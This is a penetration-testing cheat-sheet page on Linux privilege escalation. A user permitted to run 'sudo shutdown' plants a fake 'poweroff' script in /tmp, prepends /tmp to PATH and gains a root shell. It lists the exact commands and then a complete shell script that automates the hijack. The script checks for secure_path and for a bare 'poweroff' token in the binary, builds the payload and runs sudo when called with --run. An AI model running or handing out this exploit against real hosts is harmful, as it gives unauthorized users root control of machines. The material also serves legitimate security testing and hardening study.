Sudo Shutdown, Poweroff Privilege Escalation
Last modified: 2023-02-05
If sudo lets a low-privileged user run the "shutdown" command, it might be vulnerable to privilege escalation (PrivEsc) through PATH hijacking.
sudo -l
(ALL) NOPASSWD: /usr/sbin/shutdown
If we can execute the "shutdown" command as root and that binary invokes "poweroff" by bare name (resolved through PATH) instead of by absolute path, we can gain root by placing our own "poweroff" earlier in PATH. Two conditions must hold: sudo must pass our PATH through (if "sudo -l" lists "secure_path=..." among the Matching Defaults entries, sudo replaces PATH with that fixed value and the hijack fails), and "shutdown" must really look "poweroff" up via PATH, which can be checked with "strings /usr/sbin/shutdown | grep poweroff" before running anything.
First create a /tmp/poweroff script which invokes a shell. A shebang line makes it work even if "shutdown" execs it directly rather than through a shell.
printf '#!/bin/sh\n/bin/sh\n' > /tmp/poweroff # or /bin/bash instead of /bin/sh
Then make the file executable and prepend the "/tmp" folder to PATH.
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
Now execute "shutdown" as root via sudo. Be aware that if the binary resolves "poweroff" by absolute path, this really powers off the machine.
sudo /usr/sbin/shutdown
# /tmp/poweroff runs as root and you get a root prompt
#
/tmp/poweroff is executed and spawns a root shell. Confirm with "id".
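The whole procedure as one script, added here as an example and not code from the original page: it parses "sudo -l" output for the secure_path setting that would defeat the hijack, checks whether the shutdown binary references a bare "poweroff" token, builds the fake poweroff script, and only then runs sudo. The function names, the mktemp staging directory under /tmp and the sample "sudo -l" text used for testing are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original page): preflight checks and payload
# builder for the shutdown -> poweroff PATH hijack. Function names and the
# /tmp/privesc.XXXXXX staging directory are assumptions of this example.

# Returns 0 if a caller-supplied PATH survives sudo.
# sudo keeps the caller's PATH even under env_reset; it is only replaced
# when sudoers sets secure_path, which "sudo -l" prints under
# "Matching Defaults entries".
path_hijack_viable() {
    sudo_l_output="$1"
    if printf '%s\n' "$sudo_l_output" | grep -q 'secure_path='; then
        return 1
    fi
    return 0
}

# Returns 0 if the binary contains the bare token "poweroff" (looked up via
# PATH) rather than only an absolute path such as /usr/sbin/poweroff.
# Tokenises on anything that is not alnum, '/', '_', '.' or '-', so this
# works with grep/tr alone and does not need strings(1) from binutils.
calls_relative_poweroff() {
    bin="$1"
    [ -r "$bin" ] || return 1
    tr -c '[:alnum:]/_.-' '\n' < "$bin" | grep -qx 'poweroff'
}

# Creates DIR/poweroff as an executable sh script that spawns a shell and
# prints its path. The shebang matters: if shutdown execs "poweroff"
# directly, a file holding only "/bin/sh" would fail with ENOEXEC.
build_fake_poweroff() {
    dir="$1"
    printf '#!/bin/sh\nexec /bin/sh\n' > "$dir/poweroff"
    chmod 755 "$dir/poweroff"
    printf '%s\n' "$dir/poweroff"
}

# Live procedure: every check fails closed so that we never run the real
# shutdown and halt the box when the hijack cannot work.
run_hijack() {
    sudo_l=$(sudo -n -l 2>/dev/null) || { echo "sudo -l failed"; return 1; }
    printf '%s\n' "$sudo_l" | grep -q 'NOPASSWD: /usr/sbin/shutdown' \
        || { echo "no NOPASSWD shutdown entry"; return 1; }
    path_hijack_viable "$sudo_l" \
        || { echo "secure_path is set: PATH hijack impossible"; return 1; }
    calls_relative_poweroff /usr/sbin/shutdown \
        || { echo "shutdown does not look up poweroff via PATH; not running it"; return 1; }
    dir=$(mktemp -d /tmp/privesc.XXXXXX) || return 1
    build_fake_poweroff "$dir" >/dev/null
    # PATH is handed to sudo as part of its environment; without secure_path
    # it reaches shutdown, which then finds our poweroff first.
    PATH="$dir:$PATH" sudo /usr/sbin/shutdown
}

# Only run the live procedure when explicitly asked: ./hijack.sh --run
if [ "${1:-}" = "--run" ]; then
    run_hijack
fi
```

The checks are deliberately ordered from cheapest to most dangerous: reading sudoers output and grepping the binary cost nothing, whereas a blind "sudo shutdown" on a non-vulnerable host powers it off and ends the engagement.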